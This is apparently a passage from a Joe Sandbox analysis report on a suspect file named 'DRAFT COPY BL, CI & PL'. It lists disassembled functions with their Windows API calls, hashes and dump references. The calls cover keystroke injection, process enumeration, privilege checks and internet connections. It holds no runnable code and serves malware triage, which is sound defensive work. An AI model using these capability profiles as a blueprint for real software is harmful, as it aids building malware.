                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID:
                                                                • API String ID: 432972143-0
                                                                • Opcode ID: 31103a5ba9fb4cb4ef7f295fae2a36c925eb72d21abf6442a292fa2a16d868e2
                                                                • Instruction ID: ddc3b9fcec2174960d3dfa66bb8a2f9eaee57f2bfb1312d4d4dcc646ea9ad9cb
                                                                • Opcode Fuzzy Hash: 31103a5ba9fb4cb4ef7f295fae2a36c925eb72d21abf6442a292fa2a16d868e2
                                                                • Instruction Fuzzy Hash: 92313A70D44218AEFF358B2D8C05BFEBBADABC5329F08436AF5B1521D1C3B989909751
                                                                Function 00990C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00990C66
                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00990C82
                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00990CE1
                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00990D33
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID:
                                                                • API String ID: 432972143-0
                                                                • Opcode ID: 591f81b7eea2891fa61238a8001e629f625d1ed857184913e627c928d79f3c96
                                                                • Instruction ID: 65af0c7d2e2232c1fb4b6701a0f5f23360c3a3a439d8157c68ccdafaf1c6e284
                                                                • Opcode Fuzzy Hash: 591f81b7eea2891fa61238a8001e629f625d1ed857184913e627c928d79f3c96
                                                                • Instruction Fuzzy Hash: 58314630900308AEFF308B6C8C147FEBBAAABC5320F08871AE4E0521D1D3799D55D7A1
                                                                Function 009661C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009661FB
                                                                • __isleadbyte_l.LIBCMT ref: 00966229
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00966257
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0096628D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                • String ID:
                                                                • API String ID: 3058430110-0
                                                                • Opcode ID: 6d79e4e3bb081bbbfab112016538bff61c6cb43bf625adea283487b5b19fe8bf
                                                                • Instruction ID: b1a4c7d11f165895f3c175d60d5c5880a431843fbb813cdee8e4cc4295793523
                                                                • Opcode Fuzzy Hash: 6d79e4e3bb081bbbfab112016538bff61c6cb43bf625adea283487b5b19fe8bf
                                                                • Instruction Fuzzy Hash: 5631DE30608246AFDF218F65CC54BAA7FA9FF82320F154529E864D71A1E731E950DB90
                                                                Function 009B4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 009B4F02
                                                                  • Part of subcall function 00993641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0099365B
                                                                  • Part of subcall function 00993641: GetCurrentThreadId.KERNEL32 ref: 00993662
                                                                  • Part of subcall function 00993641: AttachThreadInput.USER32(00000000,?,00995005), ref: 00993669
                                                                • GetCaretPos.USER32(?), ref: 009B4F13
                                                                • ClientToScreen.USER32(00000000,?), ref: 009B4F4E
                                                                • GetForegroundWindow.USER32 ref: 009B4F54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                • String ID:
                                                                • API String ID: 2759813231-0
                                                                • Opcode ID: 0b6d0b5ee9bde9843560bf4c4e308817e98ea90bed2c4e92b7dc78dae22bb425
                                                                • Instruction ID: 1c14689901f30e79826e1d0ad56e50f64214125f6bd3a55fb132498f6662eb14
                                                                • Opcode Fuzzy Hash: 0b6d0b5ee9bde9843560bf4c4e308817e98ea90bed2c4e92b7dc78dae22bb425
                                                                • Instruction Fuzzy Hash: C8310C75D00108AFDB10EFA9C985AEFB7F9EF99310F10446AF415E7241DA75AE058FA0
                                                                Function 00993C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00993C7A
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00993C88
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00993CA8
                                                                • CloseHandle.KERNEL32(00000000), ref: 00993D52
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 420147892-0
                                                                • Opcode ID: d452cbce5289568bbb5db48caf0f3796b6e127d4e874df26c1cb86b397031cd5
                                                                • Instruction ID: 1624a97d719130b6300f2456bad9d4f89e5bea5e11012a25d089db5ab1e5ee98
                                                                • Opcode Fuzzy Hash: d452cbce5289568bbb5db48caf0f3796b6e127d4e874df26c1cb86b397031cd5
                                                                • Instruction Fuzzy Hash: 2F31C07110C3059FD710EF58C891BAFBBE8EFC9354F40092CF481861A1EB71AA49CB92
                                                                Function 009BC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • GetCursorPos.USER32(?), ref: 009BC4D2
                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0096B9AB,?,?,?,?,?), ref: 009BC4E7
                                                                • GetCursorPos.USER32(?), ref: 009BC534
                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0096B9AB,?,?,?), ref: 009BC56E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                • String ID:
                                                                • API String ID: 2864067406-0
                                                                • Opcode ID: f6f5385e106fd2f0eeb66eb1ed2d4b03393bcfc43a13930dd14dcaecf20e57cf
                                                                • Instruction ID: e10d5a0eb227774a55000735790a4ef18af2a828628845f294f25e8e8f503d8e
                                                                • Opcode Fuzzy Hash: f6f5385e106fd2f0eeb66eb1ed2d4b03393bcfc43a13930dd14dcaecf20e57cf
                                                                • Instruction Fuzzy Hash: 1F31DD75614018AFCB25CF58CD98EFA7BBAEB09320F044169F9058B261C771BD50EFA4
                                                                Function 00988656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0098810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00988121
                                                                  • Part of subcall function 0098810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0098812B
                                                                  • Part of subcall function 0098810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0098813A
                                                                  • Part of subcall function 0098810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00988141
                                                                  • Part of subcall function 0098810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00988157
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009886A3
                                                                • _memcmp.LIBCMT ref: 009886C6
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009886FC
                                                                • HeapFree.KERNEL32(00000000), ref: 00988703
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                • String ID:
                                                                • API String ID: 1592001646-0
                                                                • Opcode ID: eeafcdfb6930cc8c302d29c9439473341f498e61441ac913a0bd0a7ef35ccaa1
                                                                • Instruction ID: 21a00a135fcad47ed264b81c989eb80fd26504afa8fcbb7e5636d5b14bc1c884
                                                                • Opcode Fuzzy Hash: eeafcdfb6930cc8c302d29c9439473341f498e61441ac913a0bd0a7ef35ccaa1
                                                                • Instruction Fuzzy Hash: F5218E72E44109EFDB10EFA8CA49BEEB7B8EF44315F554059E444A7340EB31AE05DB60
                                                                Function 0095098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __setmode.LIBCMT ref: 009509AE
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00997896,?,?,00000000), ref: 00935A2C
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00997896,?,?,00000000,?,?), ref: 00935A50
                                                                • _fprintf.LIBCMT ref: 009509E5
                                                                • OutputDebugStringW.KERNEL32(?), ref: 00985DBB
                                                                  • Part of subcall function 00954AAA: _flsall.LIBCMT ref: 00954AC3
                                                                • __setmode.LIBCMT ref: 00950A1A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                • String ID:
                                                                • API String ID: 521402451-0
                                                                • Opcode ID: 7a6accbea913d0a88ed146ebc8c9d50e9ec5ce279289a0108ded3399f9efaca5
                                                                • Instruction ID: 0fce96596d6b83346f8be5f28a7f4d2ada5661ac421c7bd96dd8eb6e340386fd
                                                                • Opcode Fuzzy Hash: 7a6accbea913d0a88ed146ebc8c9d50e9ec5ce279289a0108ded3399f9efaca5
                                                                • Instruction Fuzzy Hash: F6113A319042046FDB04F3B99C86BBE77AC9FC6325F140119FA05971C2EE60489A9BA1
                                                                Function 009A1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009A17A3
                                                                  • Part of subcall function 009A182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009A184C
                                                                  • Part of subcall function 009A182D: InternetCloseHandle.WININET(00000000), ref: 009A18E9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                • String ID:
                                                                • API String ID: 1463438336-0
                                                                • Opcode ID: 5556866e37477fbd79376e30247cfd30c09697c44f2718e8ec782113ae6b940c
                                                                • Instruction ID: 5e46e5227a759f114f962d4466e9b10583c44319c8751d6fccf637837fea6bfd
                                                                • Opcode Fuzzy Hash: 5556866e37477fbd79376e30247cfd30c09697c44f2718e8ec782113ae6b940c
                                                                • Instruction Fuzzy Hash: 1021F331204605BFEB169F68CC40FBABBEDFF8A710F10452AFA1196650DB75D810A7E0
                                                                Function 00993A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNEL32(?,009BFAC0), ref: 00993A64
                                                                • GetLastError.KERNEL32 ref: 00993A73
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00993A82
                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009BFAC0), ref: 00993ADF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                • String ID:
                                                                • API String ID: 2267087916-0
                                                                • Opcode ID: 553d6e86bb65936ec80262f756bced1b57dc79a95a1a0087a123b6ed46c5e7a8
                                                                • Instruction ID: 850cff95230fdc7131fcd104888ff609a9654e7b770e8d4bfb4658acb91650dd
                                                                • Opcode Fuzzy Hash: 553d6e86bb65936ec80262f756bced1b57dc79a95a1a0087a123b6ed46c5e7a8
                                                                • Instruction Fuzzy Hash: CA2183745092019F8B10DF2CC9919AAB7E8EF59364F108A2DF4A9C72A1D731DE46CB42
                                                                Function 0098DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0098F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0098DCD3,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?), ref: 0098F0CB
                                                                  • Part of subcall function 0098F0BC: lstrcpyW.KERNEL32(00000000,?,?,0098DCD3,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098F0F1
                                                                  • Part of subcall function 0098F0BC: lstrcmpiW.KERNEL32(00000000,?,0098DCD3,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?), ref: 0098F122
                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098DCEC
                                                                • lstrcpyW.KERNEL32(00000000,?,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098DD12
                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098DD46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                • String ID: cdecl
                                                                • API String ID: 4031866154-3896280584
                                                                • Opcode ID: 2c802322411c59c3651a8962e0566bb98d6719526c68b295ce988c3cc0d20ff9
                                                                • Instruction ID: 9b74623d1e52f02d95618f709def0f8fb854a4a78cf6321e88e3572c296914d2
                                                                • Opcode Fuzzy Hash: 2c802322411c59c3651a8962e0566bb98d6719526c68b295ce988c3cc0d20ff9
                                                                • Instruction Fuzzy Hash: 5111BE3A200305EFCB25AF74DC45A7A77A8FF85360B40952AE806CB3E0EB719841D791
                                                                Function 009650E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00965101
                                                                  • Part of subcall function 0095571C: __FF_MSGBANNER.LIBCMT ref: 00955733
                                                                  • Part of subcall function 0095571C: __NMSG_WRITE.LIBCMT ref: 0095573A
                                                                  • Part of subcall function 0095571C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000000,?,?,?,00950DD3,?), ref: 0095575F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: d7751542a8590e01f0b846eff155d87acd6f00ae7e4ce05b35e5a2f05be7b4f6
                                                                • Instruction ID: 63f17704d12dae781a1b945ea93d28167cf95d028cb4bb9d83bcc3c7f52818be
                                                                • Opcode Fuzzy Hash: d7751542a8590e01f0b846eff155d87acd6f00ae7e4ce05b35e5a2f05be7b4f6
                                                                • Instruction Fuzzy Hash: C411E0B290CA12AFCB316F75EC0676E379C9B463A2F13492AFD09AA150DE34C9449790
                                                                Function 009A6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00997896,?,?,00000000), ref: 00935A2C
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00997896,?,?,00000000,?,?), ref: 00935A50
                                                                • gethostbyname.WSOCK32(?,?,?), ref: 009A6399
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A63A4
                                                                • _memmove.LIBCMT ref: 009A63D1
                                                                • inet_ntoa.WSOCK32(?), ref: 009A63DC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                • String ID:
                                                                • API String ID: 1504782959-0
                                                                • Opcode ID: 90cc226df55b476f4e963759ec340609eeb10c3afdd6dc8fe9863229801f1fd2
                                                                • Instruction ID: dc78905631e588c353ff1cef7ea3bf9266be2a2b4634825552047a528ff487e1
                                                                • Opcode Fuzzy Hash: 90cc226df55b476f4e963759ec340609eeb10c3afdd6dc8fe9863229801f1fd2
                                                                • Instruction Fuzzy Hash: 0D116331500109AFCB00FBA4DD96EEEB7B8AF89310B544165F506E7261DB309F04DFA1
                                                                Function 00988B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00988B61
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00988B73
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00988B89
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00988BA4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 3306209b8b921eafd5a8cf717ad3e63d1e62f426baa6401bbac3abcc577e433e
                                                                • Instruction ID: 902d61d3fb0346469bb5ca384180ac2f991bc5bc3053eeb7324339e5ed4066ad
                                                                • Opcode Fuzzy Hash: 3306209b8b921eafd5a8cf717ad3e63d1e62f426baa6401bbac3abcc577e433e
                                                                • Instruction Fuzzy Hash: 15115E79901218FFDB10DFA5CC84FAEBB78FB48310F2040A5E900B7290DA716E10DBA4
                                                                Function 00931290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 009312D8
                                                                • GetClientRect.USER32(?,?), ref: 0096B5FB
                                                                • GetCursorPos.USER32(?), ref: 0096B605
                                                                • ScreenToClient.USER32(?,?), ref: 0096B610
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
